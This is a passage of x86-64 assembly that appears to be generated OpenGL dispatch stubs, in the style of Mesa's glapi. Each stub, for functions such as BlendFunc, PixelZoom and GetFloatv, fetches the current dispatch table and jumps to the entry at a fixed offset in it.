call _x86_64_get_dispatch@PLT
popq %rdi
movq 1896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1896(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalPoint1), .-GL_PREFIX(EvalPoint1)
.p2align 4,,15
.globl GL_PREFIX(EvalMesh2)
.type GL_PREFIX(EvalMesh2), @function
GL_PREFIX(EvalMesh2):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1904(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalMesh2), .-GL_PREFIX(EvalMesh2)
.p2align 4,,15
.globl GL_PREFIX(EvalPoint2)
.type GL_PREFIX(EvalPoint2), @function
GL_PREFIX(EvalPoint2):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalPoint2), .-GL_PREFIX(EvalPoint2)
.p2align 4,,15
.globl GL_PREFIX(AlphaFunc)
.type GL_PREFIX(AlphaFunc), @function
GL_PREFIX(AlphaFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1920(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFunc), .-GL_PREFIX(AlphaFunc)
.p2align 4,,15
.globl GL_PREFIX(BlendFunc)
.type GL_PREFIX(BlendFunc), @function
GL_PREFIX(BlendFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BlendFunc), .-GL_PREFIX(BlendFunc)
.p2align 4,,15
.globl GL_PREFIX(LogicOp)
.type GL_PREFIX(LogicOp), @function
GL_PREFIX(LogicOp):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1936(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LogicOp), .-GL_PREFIX(LogicOp)
.p2align 4,,15
.globl GL_PREFIX(StencilFunc)
.type GL_PREFIX(StencilFunc), @function
GL_PREFIX(StencilFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilFunc), .-GL_PREFIX(StencilFunc)
.p2align 4,,15
.globl GL_PREFIX(StencilOp)
.type GL_PREFIX(StencilOp), @function
GL_PREFIX(StencilOp):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilOp), .-GL_PREFIX(StencilOp)
.p2align 4,,15
.globl GL_PREFIX(DepthFunc)
.type GL_PREFIX(DepthFunc), @function
GL_PREFIX(DepthFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1960(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthFunc), .-GL_PREFIX(DepthFunc)
.p2align 4,,15
.globl GL_PREFIX(PixelZoom)
.type GL_PREFIX(PixelZoom), @function
GL_PREFIX(PixelZoom):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1968(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelZoom), .-GL_PREFIX(PixelZoom)
.p2align 4,,15
.globl GL_PREFIX(PixelTransferf)
.type GL_PREFIX(PixelTransferf), @function
GL_PREFIX(PixelTransferf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1976(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelTransferf), .-GL_PREFIX(PixelTransferf)
.p2align 4,,15
.globl GL_PREFIX(PixelTransferi)
.type GL_PREFIX(PixelTransferi), @function
GL_PREFIX(PixelTransferi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1984(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelTransferi), .-GL_PREFIX(PixelTransferi)
.p2align 4,,15
.globl GL_PREFIX(PixelStoref)
.type GL_PREFIX(PixelStoref), @function
GL_PREFIX(PixelStoref):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1992(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelStoref), .-GL_PREFIX(PixelStoref)
.p2align 4,,15
.globl GL_PREFIX(PixelStorei)
.type GL_PREFIX(PixelStorei), @function
GL_PREFIX(PixelStorei):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2000(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelStorei), .-GL_PREFIX(PixelStorei)
.p2align 4,,15
.globl GL_PREFIX(PixelMapfv)
.type GL_PREFIX(PixelMapfv), @function
GL_PREFIX(PixelMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2008(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapfv), .-GL_PREFIX(PixelMapfv)
.p2align 4,,15
.globl GL_PREFIX(PixelMapuiv)
.type GL_PREFIX(PixelMapuiv), @function
GL_PREFIX(PixelMapuiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapuiv), .-GL_PREFIX(PixelMapuiv)
.p2align 4,,15
.globl GL_PREFIX(PixelMapusv)
.type GL_PREFIX(PixelMapusv), @function
GL_PREFIX(PixelMapusv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapusv), .-GL_PREFIX(PixelMapusv)
.p2align 4,,15
.globl GL_PREFIX(ReadBuffer)
.type GL_PREFIX(ReadBuffer), @function
GL_PREFIX(ReadBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2032(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ReadBuffer), .-GL_PREFIX(ReadBuffer)
.p2align 4,,15
.globl GL_PREFIX(CopyPixels)
.type GL_PREFIX(CopyPixels), @function
GL_PREFIX(CopyPixels):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyPixels), .-GL_PREFIX(CopyPixels)
.p2align 4,,15
.globl GL_PREFIX(ReadPixels)
.type GL_PREFIX(ReadPixels), @function
GL_PREFIX(ReadPixels):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ReadPixels), .-GL_PREFIX(ReadPixels)
.p2align 4,,15
.globl GL_PREFIX(DrawPixels)
.type GL_PREFIX(DrawPixels), @function
GL_PREFIX(DrawPixels):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2056(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawPixels), .-GL_PREFIX(DrawPixels)
.p2align 4,,15
.globl GL_PREFIX(GetBooleanv)
.type GL_PREFIX(GetBooleanv), @function
GL_PREFIX(GetBooleanv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBooleanv), .-GL_PREFIX(GetBooleanv)
.p2align 4,,15
.globl GL_PREFIX(GetClipPlane)
.type GL_PREFIX(GetClipPlane), @function
GL_PREFIX(GetClipPlane):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2072(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetClipPlane), .-GL_PREFIX(GetClipPlane)
.p2align 4,,15
.globl GL_PREFIX(GetDoublev)
.type GL_PREFIX(GetDoublev), @function
GL_PREFIX(GetDoublev):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2080(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetDoublev), .-GL_PREFIX(GetDoublev)
.p2align 4,,15
.globl GL_PREFIX(GetError)
.type GL_PREFIX(GetError), @function
GL_PREFIX(GetError):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 2088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2088(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 2088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetError), .-GL_PREFIX(GetError)
.p2align 4,,15
.globl GL_PREFIX(GetFloatv)
.type GL_PREFIX(GetFloatv), @function
GL_PREFIX(GetFloatv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2096(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFloatv), .-GL_PREFIX(GetFloatv)
.p2align 4,,15
.globl GL_PREFIX(GetIntegerv)
.type GL_PREFIX(GetIntegerv), @function
GL_PREFIX(GetIntegerv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetIntegerv), .-GL_PREFIX(GetIntegerv)
.p2align 4,,15
.globl GL_PREFIX(GetLightfv)
.type GL_PREFIX(GetLightfv), @function
GL_PREFIX(GetLightfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetLightfv), .-GL_PREFIX(GetLightfv)
.p2align 4,,15
.globl GL_PREFIX(GetLightiv)
.type GL_PREFIX(GetLightiv), @function
GL_PREFIX(GetLightiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetLightiv), .-GL_PREFIX(GetLightiv)
.p2align 4,,15
.globl GL_PREFIX(GetMapdv)
.type GL_PREFIX(GetMapdv), @function
GL_PREFIX(GetMapdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapdv), .-GL_PREFIX(GetMapdv)
.p2align 4,,15
.globl GL_PREFIX(GetMapfv)
.type GL_PREFIX(GetMapfv), @function
GL_PREFIX(GetMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2136(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapfv), .-GL_PREFIX(GetMapfv)
.p2align 4,,15
.globl GL_PREFIX(GetMapiv)
.type GL_PREFIX(GetMapiv), @function
GL_PREFIX(GetMapiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapiv), .-GL_PREFIX(GetMapiv)
.p2align 4,,15
.globl GL_PREFIX(GetMaterialfv)
.type GL_PREFIX(GetMaterialfv), @function
GL_PREFIX(GetMaterialfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMaterialfv), .-GL_PREFIX(GetMaterialfv)
.p2align 4,,15
.globl GL_PREFIX(GetMaterialiv)
.type GL_PREFIX(GetMaterialiv), @function
GL_PREFIX(GetMaterialiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2160(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMaterialiv), .-GL_PREFIX(GetMaterialiv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapfv)
.type GL_PREFIX(GetPixelMapfv), @function
GL_PREFIX(GetPixelMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
